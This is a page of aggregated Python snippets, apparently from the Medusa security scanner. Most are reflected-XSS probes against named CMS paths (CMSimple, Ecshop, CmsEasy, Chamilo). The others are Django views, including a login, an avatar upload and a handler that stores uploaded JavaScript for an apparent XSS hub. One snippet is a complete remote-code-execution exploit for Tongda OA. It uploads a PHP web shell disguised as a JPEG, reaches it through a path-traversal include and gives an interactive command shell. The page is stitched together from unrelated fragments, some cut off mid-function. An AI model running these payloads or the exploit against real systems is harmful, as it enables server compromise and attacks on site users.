        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        resp = requests.get(payload_url ,headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find('<script>alert("'+rm+'")</script>') != -1 :
            Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
Exemple #21
0
def medusa(Url,RandomAgent,ProxyIp):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(10)
        payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(rm)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url ,headers=headers, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find('<script>alert("'+rm+'")</script>') != -1 :
            Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            web=VulnerabilityDetails(_t.info)
            web.Low() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        rm = randoms().result(20)
        payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(
            rm)
        payload_url = url + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("<script>alert({})</script>".format(rm)) != -1:
            Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
Exemple #23
0
def GenerateProject(request):#用来生成项目,并且生成文件和用户绑定
    RequestLogRecord(request, request_api="create_cross_site_script_project")
    if request.method == "POST":
        try:
            JavaScriptFileData = json.loads(request.body)["javascript_data"]#获取前端传入的加密过的js文件数据
            ProjectName = json.loads(request.body)["project_name"]#项目名
            UserToken = json.loads(request.body)["token"]
            Uid = UserInfo().QueryUidWithToken(UserToken)  # 如果登录成功后就来查询用户名
            if Uid != None and JavaScriptFileData!=None:  # 查到了UID,并且js数据不为空
                UserOperationLogRecord(request, request_api="create_cross_site_script_project", uid=Uid)
                GetJavaScriptFilePath().Result()#获取js文件路径
                while True:#如果查询确实冲突了
                    JavaScriptSaveFileName=randoms().result(5)#文件名
                    QueryJavaScriptSaveFileNameValidity = CrossSiteScriptProject().RepeatInvestigation(file_name=JavaScriptSaveFileName)#判断文件是否重复
                    if not QueryJavaScriptSaveFileNameValidity:#如果不冲突的话跳出循环
                        break
                JavaScriptSaveRoute = GetJavaScriptFilePath().Result() + JavaScriptSaveFileName  # 获得保存路径
                with open(JavaScriptSaveRoute, 'wb') as f:
                    f.write(base64.b64decode(str(JavaScriptFileData).encode('utf-8')))#文件内容还要加密
                CrossSiteScriptProject().Write(file_name=JavaScriptSaveFileName,uid=Uid,project_name=ProjectName)#写到数据库表中
                return JsonResponse({'message': "欧拉欧拉欧拉欧拉欧拉欧拉欧拉欧拉(๑•̀ㅂ•́)و✧", 'code': 200, })
            else:
                return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        except Exception as e:
            ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_GenerateProject(def)", e)
            return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=randoms().result(20)
        payload = "/demo.php?time=alert('{}')".format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url,headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find("time:alert('{}'),".format(RD)) != -1 :
            Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemple #25
0
def medusa(Url, RandomAgent, UnixTimestamp):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(20)
        payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(rm)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        if con.find("<script>confirm({})</script>".format(rm)) != -1:
            Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemple #26
0
def command(url):
    cmd_rm=randoms().result(10)
    url1 = url + '/ispirit/im/upload.php'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
        "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
        "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
    data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['%s'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"%(cmd_rm,cmd_rm)
    result = requests.post(url1, headers=headers, data=data,proxies={'http':'127.0.0.1:8080'})
    name = "".join(re.findall("2003_(.+?)\|", result.text))
    url2 = url + '/ispirit/interface/gateway.php'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
        "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded"}

    while(1):
        command = input("fuhei@shell$ ")
        if command == 'exit' or command  == 'quit':
            break
        else:
            data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" % (name,cmd_rm), "%s"%cmd_rm: "%s" %command}
            result = requests.post(url2, headers=headers, data=data,proxies={'http':'127.0.0.1:8080'})
            print(result.text)
Exemple #27
0
def UpdateKey(request):  #更新Key
    RequestLogRecord(request, request_api="update_key")
    if request.method == "POST":
        try:
            Token = json.loads(request.body)["token"]
            NewKey = randoms().result(40)  #生成随机的key,有可能会重复,这边先暂时不管了,这概论太j8低了
            Uid = UserInfo().QueryUidWithToken(Token)  # 如果登录成功后就来查询UID
            if Uid != None:  # 查到了UID
                UserOperationLogRecord(request,
                                       request_api="update_key",
                                       uid=Uid)  # 查询到了在计入
                UpdateKeyResult = UserInfo().UpdateKey(uid=Uid,
                                                       key=NewKey)  #获取值查看是否成功
                if UpdateKeyResult:
                    return JsonResponse({
                        'message': '呐呐呐呐!修改成功了呢~',
                        'code': 200,
                    })
                else:
                    return JsonResponse({
                        'message': "输入信息有误重新输入",
                        'code': 404,
                    })
            else:
                return JsonResponse({
                    'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
                    'code': 403,
                })
        except Exception as e:
            ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e)
    else:
        return JsonResponse({
            'message': '请使用Post请求',
            'code': 500,
        })
Exemple #28
0
def Login(request):#用户登录,每次登录成功都会刷新一次Token
    RequestLogRecord(request, request_api="login")
    if request.method == "POST":
        try:
            Username=json.loads(request.body)["username"]
            Passwd=json.loads(request.body)["passwd"]
            VerificationCodeKey = json.loads(request.body)["verification_code_key"]#获取验证码关联的KEY
            Code = json.loads(request.body)["verification_code"].lower()#获取验证码,把验证码全部转换成小写
            Md5Passwd=Md5Encryption().Md5Result(Passwd)#对密码加密
            if VerificationCodeKey!=None and Code!=None:#判断传入数据不为空
                VerificationCodeResult=VerificationCode().Query(code=Code,verification_code_key=VerificationCodeKey)#获取判断
                if VerificationCodeResult:#如果为真,进行登录验证
                    UserLogin=UserInfo().UserLogin(Username,Md5Passwd)
                    if UserLogin is None:
                        return JsonResponse({'message': '账号或密码错误', 'code': 604, })

                    else:
                        while True:#如果查询确实冲突了
                            Token = randoms().result(250)
                            QueryTokenValidity = UserInfo().QueryTokenValidity(Token)#用来查询Token是否冲突了
                            if not QueryTokenValidity:#如果不冲突的话跳出循环
                                break
                        UpdateToken=UserInfo().UpdateToken(name=Username, token=Token)#接着更新Token
                        if UpdateToken:#如果更新成功了
                            Uid = UserInfo().QueryUidWithToken(Token)  # 查询UID
                            UserOperationLogRecord(request, request_api="login", uid=Uid)
                            return JsonResponse({'message': Token, 'code': 200, })
                else:
                    return JsonResponse({'message': "验证码错误或者过期!", 'code': 503, })
            else:
                return JsonResponse({'message': "验证码或者验证码秘钥不能为空!", 'code': 504, })
        except Exception as e:
            ErrorLog().Write("Web_BasicFunctions_User_LogIn(def)", e)
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
Exemple #29
0
def UploadAvatar(request):#文件上传功能
    RequestLogRecord(request, request_api="upload_avatar")
    Token =request.headers["token"]
    if request.method == "POST":
        try:
            Uid = UserInfo().QueryUidWithToken(Token)  # 如果登录成功后就来查询UID
            if Uid != None:  # 查到了UID
                UserOperationLogRecord(request, request_api="upload_avatar", uid=Uid)  # 查询到了在计入
                PictureData = request.FILES.get('file', None)#获取文件数据
                if 10240<PictureData.size:#最大值10MB,最小值10KB
                    SaveFileName=randoms().result(10)+str(int(time.time()))+".jpg"#重命名文件
                    SaveRoute=GetImageFilePath().Result()+SaveFileName#获得保存路径
                    with open(SaveRoute, 'wb') as f:
                        for line in PictureData:
                            f.write(line)
                    UserInfo().UpdateAvatar(avatar=SaveFileName,uid=Uid)#图片写到本地后更新用户头像
                    return JsonResponse({'message': SaveFileName, 'code': 200,})#返回上传图片名称
                else:
                    return JsonResponse({'message': '它实在是太小了,莎酱真的一点感觉都没有o(TヘTo)',  'code': 603,})
            else:
                return JsonResponse({'message': '宝贝没有用户你要插到哪里去呢?', 'code': 404, })
        except Exception as e:
            ErrorLog().Write("Web_Api_User_UploadAvatar(def)", e)
            return JsonResponse({'message': '你不对劲!为什么报错了?',  'code': 169,})
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm = randoms().result(20)
        payload = '/mobile/user.php?act=act_register'
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(rm)
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/json",
        }
        resp = requests.post(payload_url, data=data, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code==200 and con.find("<script>alert({})</script>".format(rm))!= -1:
            Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名